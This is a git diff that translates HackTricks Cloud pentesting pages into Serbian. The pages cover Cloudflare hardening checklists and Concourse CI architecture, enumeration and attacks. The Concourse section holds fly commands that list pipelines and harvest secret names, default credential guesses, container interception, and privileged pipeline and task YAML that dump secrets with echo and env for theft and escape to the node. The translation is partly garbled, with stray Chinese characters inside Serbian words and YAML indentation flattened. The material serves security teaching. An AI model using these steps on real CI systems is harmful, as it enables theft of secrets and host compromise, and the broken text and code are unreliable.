section it's recommended to check that it's **enabled** if any API is exposed in Cloudflare -- [ ] In the **`DDoS`** section it's recommended to enable the **DDoS protections** -- [ ] In the **`Settings`** section: - - [ ] Check that the **`Security Level`** is **medium** or greater - - [ ] Check that the **`Challenge Passage`** is 1 hour at max - - [ ] Check that the **`Browser Integrity Check`** is **enabled** - - [ ] Check that the **`Privacy Pass Support`** is **enabled** +- [ ] U sekciji **`WAF`** zanimljivo je proveriti da li se koriste **pravila vatrozida** i **ograničenja brzine** za sprečavanje zloupotreba. +- Akcija **`Zaobiđi`** će **onemogućiti Cloudflare sigurnosne** funkcije za zahtev. Ne bi trebala da se koristi. +- [ ] U sekciji **`Page Shield`** preporučuje se da proverite da li je **omogućena** ako se koristi neka stranica +- [ ] U sekciji **`API Shield`** preporučuje se da proverite da li je **omogućena** ako je neki API izložen u Cloudflare +- [ ] U sekciji **`DDoS`** preporučuje se omogućiti **DDoS zaštite** +- [ ] U sekciji **`Podešavanja`**: +- [ ] Proverite da je **`Nivo sigurnosti`** **srednji** ili veći +- [ ] Proverite da je **`Izazov Prolaz`** 1 sat maksimalno +- [ ] Proverite da je **`Provera Integriteta Pregledača`** **omogućena** +- [ ] Proverite da je **`Podrška za Privatnost Pass`** **omogućena** -#### **CloudFlare DDoS Protection** +#### **CloudFlare DDoS Zaštita** -- If you can, enable **Bot Fight Mode** or **Super Bot Fight Mode**. If you protecting some API accessed programmatically (from a JS front end page for example). You might not be able to enable this without breaking that access. -- In **WAF**: You can create **rate limits by URL path** or to **verified bots** (Rate limiting rules), or to **block access** based on IP, Cookie, referrer...). So you could block requests that doesn't come from a web page or has a cookie. - - If the attack is from a **verified bot**, at least **add a rate limit** to bots. - - If the attack is to a **specific path**, as prevention mechanism, add a **rate limit** in this path. - - You can also **whitelist** IP addresses, IP ranges, countries or ASNs from the **Tools** in WAF. - - Check if **Managed rules** could also help to prevent vulnerability exploitations. - - In the **Tools** section you can **block or give a challenge to specific IPs** and **user agents.** -- In DDoS you could **override some rules to make them more restrictive**. -- **Settings**: Set **Security Level** to **High** and to **Under Attack** if you are Under Attack and that the **Browser Integrity Check is enabled**. -- In Cloudflare Domains -> Analytics -> Security -> Check if **rate limit** is enabled -- In Cloudflare Domains -> Security -> Events -> Check for **detected malicious Events** +- Ako možete, omogućite **Bot Fight Mode** ili **Super Bot Fight Mode**. Ako štitite neki API koji se pristupa programatski (na primer, sa JS front-end stranice). Možda nećete moći da omogućite ovo bez prekidanja tog pristupa. +- U **WAF**: Možete kreirati **ograničenja brzine po URL putanji** ili za **verifikovane botove** (pravila ograničenja brzine), ili da **blokirate pristup** na osnovu IP, kolačića, referera...). Tako možete blokirati zahteve koji ne dolaze sa web stranice ili nemaju kolačić. +- Ako je napad od **verifikovanog bota**, barem **dodajte ograničenje brzine** za botove. +- Ako je napad na **specifičnu putanju**, kao mehanizam prevencije, dodajte **ograničenje brzine** na ovoj putanji. +- Takođe možete **dodati na belu listu** IP adrese, IP opsege, zemlje ili ASN-ove iz **Alata** u WAF-u. +- Proverite da li **Upravljana pravila** takođe mogu pomoći u sprečavanju eksploatacije ranjivosti. +- U sekciji **Alati** možete **blokirati ili dati izazov specifičnim IP-ovima** i **korisničkim agentima.** +- U DDoS-u možete **prepraviti neka pravila da ih učinite restriktivnijim**. +- **Podešavanja**: Postavite **Nivo sigurnosti** na **Visok** i na **Pod Napadom** ako ste Pod Napadom i da je **Provera Integriteta Pregledača omogućena**. +- U Cloudflare Domains -> Analitika -> Sigurnost -> Proverite da li je **ograničenje brzine** omogućeno +- U Cloudflare Domains -> Sigurnost -> Događaji -> Proverite za **otkrivene zlonamerne Događaje** -### Access +### Pristup {{#ref}} cloudflare-zero-trust-network.md {{#endref}} -### Speed +### Brzina -_I couldn't find any option related to security_ +_Nisam mogao pronaći nijednu opciju vezanu za sigurnost_ -### Caching +### Keširanje -- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool** +- [ ] U sekciji **`Konfiguracija`** razmotrite omogućavanje **CSAM Alata za Skener** -### **Workers Routes** +### **Workers Rute** -_You should have already checked_ [_cloudflare workers_](./#workers) +_Već ste trebali proveriti_ [_cloudflare workers_](./#workers) -### Rules +### Pravila TODO -### Network +### Mreža -- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled** -- [ ] **`HTTP/3 (with QUIC)`** should be **enabled** -- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled** +- [ ] Ako je **`HTTP/2`** **omogućen**, **`HTTP/2 do Origin`** treba da bude **omogućen** +- [ ] **`HTTP/3 (sa QUIC)`** treba da bude **omogućen** +- [ ] Ako je **privatnost** vaših **korisnika** važna, uverite se da je **`Onion Routing`** **omogućen** -### **Traffic** +### **Saobraćaj** TODO -### Custom Pages +### Prilagođene Stranice -- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode) +- [ ] Opcionalno je konfigurisati prilagođene stranice kada se aktivira greška vezana za sigurnost (kao što je blokada, ograničenje brzine ili sam pod napadom) -### Apps +### Aplikacije TODO ### Scrape Shield -- [ ] Check **Email Address Obfuscation** is **enabled** -- [ ] Check **Server-side Excludes** is **enabled** +- [ ] Proverite da li je **Obfuscation Email Adresa** **omogućena** +- [ ] Proverite da li su **Isključenja na Serverskoj Strani** **omogućena** ### **Zaraz** @@ -131,7 +131,3 @@ TODO TODO {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md index 491ae7bc1..bbcdc19e8 100644 --- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md +++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md @@ -2,43 +2,43 @@ {{#include ../../banners/hacktricks-training.md}} -In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:** +U **Cloudflare Zero Trust Network** nalogu postoje neka **podešavanja i usluge** koja se mogu konfigurisati. Na ovoj stranici ćemo **analizirati podešavanja vezana za sigurnost svake sekcije:**
### Analytics -- [ ] Useful to **get to know the environment** +- [ ] Korisno za **upoznavanje sa okruženjem** ### **Gateway** -- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications. - - If used, **policies** could be created to **restrict** the access to malicious sites. - - This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies. +- [ ] U **`Policies`** je moguće generisati politike za **ograničavanje** pristupa aplikacijama na osnovu **DNS**, **mreže** ili **HTTP** zahteva. +- Ako se koristi, **politike** mogu biti kreirane za **ograničavanje** pristupa zlonamernim sajtovima. +- Ovo je **samo relevantno ako se koristi gateway**, inače nema razloga za kreiranje odbrambenih politika. ### Access #### Applications -On each application: +Na svakoj aplikaciji: -- [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access. - - To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also) -- [ ] Check the **available identity providers** and make sure they **aren't too open** -- [ ] In **`Settings`**: - - [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything) - - [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP. - - [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** +- [ ] Proverite **ko** može pristupiti aplikaciji u **Policies** i proverite da **samo** **korisnici** koji **trebaju pristup** aplikaciji mogu pristupiti. +- Da bi se omogućio pristup, koristiće se **`Access Groups`** (i **dodatna pravila** se takođe mogu postaviti) +- [ ] Proverite **dostupne provajdere identiteta** i uverite se da **nisu previše otvoreni** +- [ ] U **`Settings`**: +- [ ] Proverite da **CORS nije omogućen** (ako je omogućen, proverite da je **siguran** i da ne dozvoljava sve) +- [ ] Kolačići bi trebali imati **Strict Same-Site** atribut, **HTTP Only** i **binding cookie** bi trebali biti **omogućeni** ako je aplikacija HTTP. +- [ ] Razmotrite omogućavanje **Browser rendering** za bolju **zaštitu. Više informacija o** [**remote browser isolation ovde**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.** #### **Access Groups** -- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow. -- [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**. - - Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary. +- [ ] Proverite da su grupe za pristup generisane **ispravno ograničene** na korisnike kojima bi trebale omogućiti pristup. +- [ ] Posebno je važno proveriti da **podrazumevana grupa za pristup nije previše otvorena** (ne **dozvoljava previše ljudi**) jer je po **podrazumevano** svako u toj **grupi** u mogućnosti da **pristupi aplikacijama**. +- Imajte na umu da je moguće dati **pristup** **SVIMA** i druge **veoma otvorene politike** koje se ne preporučuju osim ako nisu 100% neophodne. #### Service Auth -- [ ] Check that all service tokens **expires in 1 year or less** +- [ ] Proverite da svi tokeni usluga **isteknu za 1 godinu ili manje** #### Tunnels @@ -50,16 +50,12 @@ TODO ### Logs -- [ ] You could search for **unexpected actions** from users +- [ ] Možete tražiti **neočekivane akcije** od korisnika ### Settings -- [ ] Check the **plan type** -- [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address** -- [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service +- [ ] Proverite **tip plana** +- [ ] Moguće je videti **ime vlasnika kreditne kartice**, **poslednje 4 cifre**, **datum isteka** i **adresu** +- [ ] Preporučuje se da se **doda isteka korisničkog mesta** kako bi se uklonili korisnici koji zaista ne koriste ovu uslugu {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/README.md b/src/pentesting-ci-cd/concourse-security/README.md index bcf20facf..be3722932 100644 --- a/src/pentesting-ci-cd/concourse-security/README.md +++ b/src/pentesting-ci-cd/concourse-security/README.md @@ -2,13 +2,13 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...) +Concourse vam omogućava da **pravite pipeline-e** za automatsko pokretanje testova, akcija i izgradnju slika kada god vam zatreba (na osnovu vremena, kada se nešto desi...) -## Concourse Architecture +## Arhitektura Concourse-a -Learn how the concourse environment is structured in: +Saznajte kako je okruženje concourse-a strukturirano u: {{#ref}} concourse-architecture.md @@ -16,22 +16,18 @@ concourse-architecture.md ## Concourse Lab -Learn how you can run a concourse environment locally to do your own tests in: +Saznajte kako možete pokrenuti concourse okruženje lokalno da biste uradili svoje testove u: {{#ref}} concourse-lab-creation.md {{#endref}} -## Enumerate & Attack Concourse +## Enumeracija i Napad na Concourse -Learn how you can enumerate the concourse environment and abuse it in: +Saznajte kako možete enumerisati okruženje concourse-a i zloupotrebiti ga u: {{#ref}} concourse-enumeration-and-attacks.md {{#endref}} {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md index d70167906..582c37d3a 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md @@ -1,42 +1,38 @@ -# Concourse Architecture +# Concourse Arhitektura -## Concourse Architecture +## Concourse Arhitektura {{#include ../../banners/hacktricks-training.md}} -[**Relevant data from Concourse documentation:**](https://concourse-ci.org/internals.html) +[**Relevantni podaci iz Concourse dokumentacije:**](https://concourse-ci.org/internals.html) -### Architecture +### Arhitektura ![](<../../images/image (187).png>) -#### ATC: web UI & build scheduler +#### ATC: web UI i raspoređivač gradnje -The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs). +ATC je srce Concourse-a. Pokreće **web UI i API** i odgovoran je za sve **raspoređivanje** pipeline-a. **Povezuje se sa PostgreSQL**, koji koristi za skladištenje podataka o pipeline-u (uključujući logove gradnje). -The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes. +Odgovornost [checker-a](https://concourse-ci.org/checker.html) je da kontinuirano proverava nove verzije resursa. [Raspoređivač](https://concourse-ci.org/scheduler.html) je odgovoran za raspoređivanje gradnji za posao, a [traker gradnje](https://concourse-ci.org/build-tracker.html) je odgovoran za pokretanje bilo kojih raspoređenih gradnji. [Sakupljač otpada](https://concourse-ci.org/garbage-collector.html) je mehanizam za čišćenje koji uklanja sve neiskorišćene ili zastarele objekte, kao što su kontejneri i volumeni. -#### TSA: worker registration & forwarding +#### TSA: registracija radnika i prosleđivanje -The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc). +TSA je **prilagođeni SSH server** koji se koristi isključivo za sigurno **registraciju** [**radnika**](https://concourse-ci.org/internals.html#architecture-worker) sa [ATC](https://concourse-ci.org/internals.html#component-atc). -The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer. +TSA po **default-u sluša na portu `2222`**, i obično je smešten sa [ATC](https://concourse-ci.org/internals.html#component-atc) i nalazi se iza balansirača opterećenja. -The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa). +**TSA implementira CLI preko SSH veze,** podržavajući [**ove komande**](https://concourse-ci.org/internals.html#component-tsa). -#### Workers +#### Radnici -In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim). +Da bi izvršio zadatke, Concourse mora imati neke radnike. Ovi radnici **registruju sebe** putem [TSA](https://concourse-ci.org/internals.html#component-tsa) i pokreću usluge [**Garden**](https://github.com/cloudfoundry-incubator/garden) i [**Baggageclaim**](https://github.com/concourse/baggageclaim). -- **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**. -- **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**. +- **Garden**: Ovo je **API za upravljanje kontejnerima**, obično se pokreće na **portu 7777** putem **HTTP**. +- **Baggageclaim**: Ovo je **API za upravljanje volumenima**, obično se pokreće na **portu 7788** putem **HTTP**. -## References +## Reference - [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md index 4b778a804..b068ae1c2 100644 --- a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md +++ b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md @@ -6,213 +6,202 @@ ### User Roles & Permissions -Concourse comes with five roles: +Concourse dolazi sa pet uloga: -- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC. -- **owner**: Team owners can **modify everything within the team**. -- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings. -- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations. -- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines. +- _Concourse_ **Admin**: Ova uloga se dodeljuje samo vlasnicima **glavnog tima** (podrazumevani inicijalni concourse tim). Admini mogu **konfigurisati druge timove** (npr.: `fly set-team`, `fly destroy-team`...). Dozvole ove uloge ne mogu biti pogođene RBAC-om. +- **owner**: Vlasnici tima mogu **modifikovati sve unutar tima**. +- **member**: Članovi tima mogu **čitati i pisati** unutar **sredstava tima** ali ne mogu modifikovati postavke tima. +- **pipeline-operator**: Operatori pipeline-a mogu izvoditi **operacije pipeline-a** kao što su pokretanje build-ova i pinovanje resursa, međutim ne mogu ažurirati konfiguracije pipeline-a. +- **viewer**: Gledaoci tima imaju **"samo za čitanje"** pristup timu i njegovim pipeline-ima. > [!NOTE] -> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) +> Pored toga, **dozvole uloga owner, member, pipeline-operator i viewer mogu biti modifikovane** konfigurišući RBAC (konfigurišući preciznije njegove akcije). Pročitajte više o tome na: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html) -Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them. +Napomena da Concourse **grupiše pipeline-e unutar timova**. Stoga korisnici koji pripadaju timu će moći da upravljaju tim pipeline-ima i **several Teams** može postojati. Korisnik može pripadati više timova i imati različite dozvole unutar svakog od njih. ### Vars & Credential Manager -In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\ -[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\ -The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\ -Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`. +U YAML konfiguracijama možete konfigurisati vrednosti koristeći sintaksu `((_source-name_:_secret-path_._secret-field_))`.\ +[Iz dokumenata:](https://concourse-ci.org/vars.html#var-syntax) **source-name je opcionalan**, i ako se izostavi, koristiće se [menadžer kredencijala na nivou klastera](https://concourse-ci.org/vars.html#cluster-wide-credential-manager), ili se vrednost može pružiti [statički](https://concourse-ci.org/vars.html#static-vars).\ +**Opcionalni \_secret-field**\_ specificira polje na preuzetom tajnom podatku koje treba pročitati. Ako se izostavi, menadžer kredencijala može izabrati da pročita 'podrazumevano polje' iz preuzetog kredencijala ako polje postoji.\ +Pored toga, _**secret-path**_ i _**secret-field**_ mogu biti okruženi dvostrukim navodnicima `"..."` ako **sadrže specijalne karaktere** kao što su `.` i `:`. Na primer, `((source:"my.secret"."field:1"))` će postaviti _secret-path_ na `my.secret` i _secret-field_ na `field:1`. #### Static Vars -Static vars can be specified in **tasks steps**: - +Statičke varijable mogu biti specificirane u **koracima zadataka**: ```yaml - task: unit-1.13 - file: booklit/ci/unit.yml - vars: { tag: 1.13 } +file: booklit/ci/unit.yml +vars: { tag: 1.13 } ``` +Or korišćenjem sledećih `fly` **argumenata**: -Or using the following `fly` **arguments**: +- `-v` ili `--var` `NAME=VALUE` postavlja string `VALUE` kao vrednost za var `NAME`. +- `-y` ili `--yaml-var` `NAME=VALUE` parsira `VALUE` kao YAML i postavlja ga kao vrednost za var `NAME`. +- `-i` ili `--instance-var` `NAME=VALUE` parsira `VALUE` kao YAML i postavlja ga kao vrednost za instancu var `NAME`. Pogledajte [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) da biste saznali više o instancama var. +- `-l` ili `--load-vars-from` `FILE` učitava `FILE`, YAML dokument koji sadrži mapiranje imena var na vrednosti, i postavlja ih sve. -- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`. -- `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`. -- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars. -- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all. +#### Upravljanje akreditivima -#### Credential Management +Postoje različiti načini na koje se **Upravljač akreditivima može specificirati** u pipeline-u, pročitajte kako na [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\ +Pored toga, Concourse podržava različite upravljače akreditivima: -There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\ -Moreover, Concourse supports different credential managers: - -- [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html) -- [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html) -- [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html) -- [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html) -- [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html) -- [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html) -- [Caching credentials](https://concourse-ci.org/creds-caching.html) -- [Redacting credentials](https://concourse-ci.org/creds-redacting.html) -- [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html) +- [Upravljač akreditivima Vault](https://concourse-ci.org/vault-credential-manager.html) +- [Upravljač akreditivima CredHub](https://concourse-ci.org/credhub-credential-manager.html) +- [Upravljač akreditivima AWS SSM](https://concourse-ci.org/aws-ssm-credential-manager.html) +- [Upravljač akreditivima AWS Secrets Manager](https://concourse-ci.org/aws-asm-credential-manager.html) +- [Upravljač akreditivima Kubernetes](https://concourse-ci.org/kubernetes-credential-manager.html) +- [Upravljač akreditivima Conjur](https://concourse-ci.org/conjur-credential-manager.html) +- [Keširanje akreditiva](https://concourse-ci.org/creds-caching.html) +- [Redigovanje akreditiva](https://concourse-ci.org/creds-redacting.html) +- [Ponovno pokušavanje neuspešnih preuzimanja](https://concourse-ci.org/creds-retry-logic.html) > [!CAUTION] -> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them. +> Imajte na umu da ako imate neku vrstu **pristupa za pisanje Concourse-u** možete kreirati poslove za **ekstrakciju tih tajni** jer Concourse mora imati mogućnost pristupa njima. -### Concourse Enumeration +### Concourse Enumeracija -In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file. +Da biste enumerisali Concourse okruženje, prvo morate **prikupiti važeće akreditive** ili pronaći **autentifikovani token** verovatno u `.flyrc` konfiguracionom fajlu. -#### Login and Current User enum +#### Prijava i trenutni korisnik enum -- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**: - - `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` -- Get configured **targets**: - - `fly targets` -- Get if the configured **target connection** is still **valid**: - - `fly -t status` -- Get **role** of the user against the indicated target: - - `fly -t userinfo` +- Da biste se prijavili, morate znati **endpoint**, **ime tima** (podrazumevano je `main`) i **tim kojem korisnik pripada**: +- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]` +- Dobijte konfigurirane **ciljeve**: +- `fly targets` +- Proverite da li je konfigurisana **veza sa ciljem** još uvek **važeća**: +- `fly -t status` +- Dobijte **ulogu** korisnika u odnosu na navedeni cilj: +- `fly -t userinfo` > [!NOTE] -> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials. +> Imajte na umu da je **API token** **sačuvan** u `$HOME/.flyrc` podrazumevano, dok pretražujete mašine mogli biste pronaći akreditive tamo. -#### Teams & Users +#### Timovi i korisnici -- Get a list of the Teams - - `fly -t teams` -- Get roles inside team - - `fly -t get-team -n ` -- Get a list of users - - `fly -t active-users` +- Dobijte listu timova +- `fly -t teams` +- Dobijte uloge unutar tima +- `fly -t get-team -n ` +- Dobijte listu korisnika +- `fly -t active-users` #### Pipelines -- **List** pipelines: - - `fly -t pipelines -a` -- **Get** pipeline yaml (**sensitive information** might be found in the definition): - - `fly -t get-pipeline -p ` -- Get all pipeline **config declared vars** - - `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` -- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them): - +- **Lista** pipelines: +- `fly -t pipelines -a` +- **Dobijte** pipeline yaml (**osetljive informacije** mogu se naći u definiciji): +- `fly -t get-pipeline -p ` +- Dobijte sve **konfiguracione varijable** pipeline-a +- `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done` +- Dobijte sve **nazive tajnih pipeline-a** (ako možete kreirati/izmeniti posao ili preuzeti kontejner, mogli biste ih ekstraktovati): ```bash rm /tmp/secrets.txt; for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do - echo $pipename; - fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; - echo ""; +echo $pipename; +fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt; +echo ""; done echo "" echo "ALL SECRETS" cat /tmp/secrets.txt | sort | uniq rm /tmp/secrets.txt ``` +#### Kontejneri i Radnici -#### Containers & Workers +- Lista **radnika**: +- `fly -t workers` +- Lista **kontejnera**: +- `fly -t containers` +- Lista **buildova** (da vidite šta se izvršava): +- `fly -t builds` -- List **workers**: - - `fly -t workers` -- List **containers**: - - `fly -t containers` -- List **builds** (to see what is running): - - `fly -t builds` +### Concourse Napadi -### Concourse Attacks - -#### Credentials Brute-Force +#### Brute-Force Akcija na Kredencijale - admin:admin - test:test -#### Secrets and params enumeration +#### Enumeracija Tajni i Parametara -In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them. +U prethodnom odeljku smo videli kako možete **dobiti sve nazive i varijable tajni** koje koristi pipeline. **Varijable mogu sadržati osetljive informacije** i naziv **tajni će biti koristan kasnije za pokušaj krađe**. -#### Session inside running or recently run container - -If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `/` **container** using: +#### Sesija unutar pokrenutog ili nedavno pokrenutog kontejnera +Ako imate dovoljno privilegija (**član uloga ili više**) moći ćete da **listaš pipelines i uloge** i jednostavno dobijete **sesiju unutar** `/` **kontejnera** koristeći: ```bash fly -t tutorial intercept --job pipeline-name/job-name fly -t tutorial intercept # To be presented a prompt with all the options ``` +Sa ovim dozvolama možda ćete moći da: -With these permissions you might be able to: +- **Uk盗ite tajne** unutar **kontejnera** +- Pokušate da **pobegnete** na čvor +- Enumerišete/Iskoristite **cloud metadata** endpoint (iz poda i sa čvora, ako je moguće) -- **Steal the secrets** inside the **container** -- Try to **escape** to the node -- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible) - -#### Pipeline Creation/Modification - -If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example: +#### Kreiranje/Izmena Pipeline-a +Ako imate dovoljno privilegija (**član uloga ili više**) moći ćete da **kreirate/menjate nove pipeline-ove.** Pogledajte ovaj primer: ```yaml jobs: - - name: simple - plan: - - task: simple-task - privileged: true - config: - # Tells Concourse which type of worker this task should run on - platform: linux - image_resource: - type: registry-image - source: - repository: busybox # images are pulled from docker hub by default - run: - path: sh - args: - - -cx - - | - echo "$SUPER_SECRET" - sleep 1000 - params: - SUPER_SECRET: ((super.secret)) +- name: simple +plan: +- task: simple-task +privileged: true +config: +# Tells Concourse which type of worker this task should run on +platform: linux +image_resource: +type: registry-image +source: +repository: busybox # images are pulled from docker hub by default +run: +path: sh +args: +- -cx +- | +echo "$SUPER_SECRET" +sleep 1000 +params: +SUPER_SECRET: ((super.secret)) ``` +Sa **modifikacijom/kreiranjem** novog pipeline-a moći ćete da: -With the **modification/creation** of a new pipeline you will be able to: +- **Uk盗** **tajne** (putem njihovog ispisivanja ili ulaskom u kontejner i pokretanjem `env`) +- **Pobegnete** na **čvor** (dajući vam dovoljno privilegija - `privileged: true`) +- Enumerišete/Iskoristite **cloud metadata** endpoint (iz poda i iz čvora) +- **Obrišete** kreirani pipeline -- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`) -- **Escape** to the **node** (by giving you enough privileges - `privileged: true`) -- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node) -- **Delete** created pipeline - -#### Execute Custom Task - -This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**): +#### Izvršite Prilagođeni Zadatak +Ovo je slično prethodnoj metodi, ali umesto modifikacije/kreiranja celog novog pipeline-a, možete **samo izvršiti prilagođeni zadatak** (što će verovatno biti mnogo **diskretnije**): ```yaml # For more task_config options check https://concourse-ci.org/tasks.html platform: linux image_resource: - type: registry-image - source: - repository: ubuntu +type: registry-image +source: +repository: ubuntu run: - path: sh - args: - - -cx - - | - env - sleep 1000 +path: sh +args: +- -cx +- | +env +sleep 1000 params: - SUPER_SECRET: ((super.secret)) +SUPER_SECRET: ((super.secret)) ``` ```bash fly -t tutorial execute --privileged --config task_config.yml ``` +#### Bekstvo na 